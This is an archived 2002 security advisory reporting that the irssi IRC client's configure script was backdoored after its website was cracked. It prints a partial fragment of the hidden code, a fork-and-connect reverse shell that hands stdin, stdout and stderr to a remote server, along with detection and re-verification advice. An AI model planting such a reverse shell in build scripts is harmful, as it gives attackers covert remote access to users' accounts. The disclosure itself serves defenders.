Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: unix5372.htm

irssi backdoor
29th May 2002 [SBWID-5372]

	irssi backdoor




	Accodringly with irssi homepage [],  main  web  site
	have been cracked  and  source  code  backdoored  for  last  two  months
	(binary not impacted).

	This code was found from configure - it forks a  new  process,  connects
	to some server and gives stdin/out/err to it (ie. giving  remote  access
	to your account):

	       int s;

	        struct sockaddr_in sa;

	        switch(fork()) { case 0: break; default: exit(0); }

	        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {



	 /* HP/UX 9 (%@#!) writes to sscanf strings */

	        memset(&sa, 0, sizeof(sa));

	        sa.sin_family = AF_INET;

	        sa.sin_port = htons(6667);

	        sa.sin_addr.s_addr = inet_addr(\"\");

	        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {



	        dup2(s, 0); dup2(s, 1); dup2(s, 2);


	If you still have the irssi sources, you can  see  if  you\'re  affected
	with grep SOCK_STREAM configure -  if  it  returns  anything,  something
	might have been done to your system.



	Upload source again - and check them with author GPG key.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH